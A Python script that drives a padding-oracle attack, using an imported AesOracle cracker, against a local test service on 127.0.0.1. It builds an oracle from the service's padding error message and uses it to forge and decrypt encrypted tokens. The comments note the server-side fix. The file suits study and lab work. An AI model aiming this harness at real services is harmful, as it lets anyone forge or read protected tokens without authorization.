import AesOracle
import requests
import base64
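if __name__ == "__main__":
    # Demo driver for AesOracle.PaddingOracleCracker against a local test
    # service on 127.0.0.1:8080. The service is treated as a padding oracle
    # because its response body differs when padding validation fails.
    # Server-side fix for this class of flaw: verify integrity before
    # decrypting (an AEAD mode, or encrypt-then-MAC) and return a single
    # uniform error for every rejected ciphertext.
    url = 'http://127.0.0.1:8080/payload/%s'
    ses = requests.Session()

    def toWeb64(b):
        """Encode bytes as the service's URL-safe base64 variant.

        Standard base64 with '=' -> '~', '+' -> '-' and '/' -> '!'.
        """
        encoded = str(base64.b64encode(b), 'ascii')
        return encoded.replace('=', '~').replace('+', '-').replace('/', '!')

    def fromWeb64(s):
        """Decode the service's URL-safe base64 variant back to bytes."""
        standard = s.replace('~', '=').replace('-', '+').replace('!', '/')
        return base64.b64decode(standard)

    def oracle(ct):
        """Return True when the service accepts the padding of `ct`.

        Raises PaddingOracleException on any non-200 status, so that a
        server failure is never counted as a padding verdict.
        """
        # A timeout keeps a stalled service from hanging the run forever;
        # requests applies no timeout unless one is passed.
        req = ses.get(url % toWeb64(ct),
                      headers={"Connection": "keep-alive"},
                      timeout=10)
        if req.status_code != 200:
            raise AesOracle.PaddingOracleCracker.PaddingOracleException("server error: " + repr(req.status_code))
        # The verdict is read from the error text in the response body;
        # the leading letter is left off the match string.
        return b"adding is incorrect" not in req.content

    collectedEnc = []
    poc = AesOracle.PaddingOracleCracker(oracle)

    # Round-trip each sample: encrypt through the oracle, print the encoded
    # token, then decrypt it again and print the recovered plaintext.
    # The second sample uses '&' separators: a non-ASCII character such as
    # '¶' inside a bytes literal is a SyntaxError.
    samples = (
        b"Test",
        b"param1=1&param2=2&param3=hello+world",  # something more complex
    )
    for plaintext in samples:
        collectedEnc.append(toWeb64(poc.Encrypt(plaintext)))
        print(collectedEnc[-1])
        b = fromWeb64(collectedEnc[-1])
        # First AES block (16 bytes) is the IV, the rest is the ciphertext.
        IV = b[:16]
        cipherT = b[16:]
        # `padded` is presumably the plaintext before unpadding; confirm
        # against AesOracle.
        orig, padded = poc.Decrypt(cipherT, IV)
        print(orig)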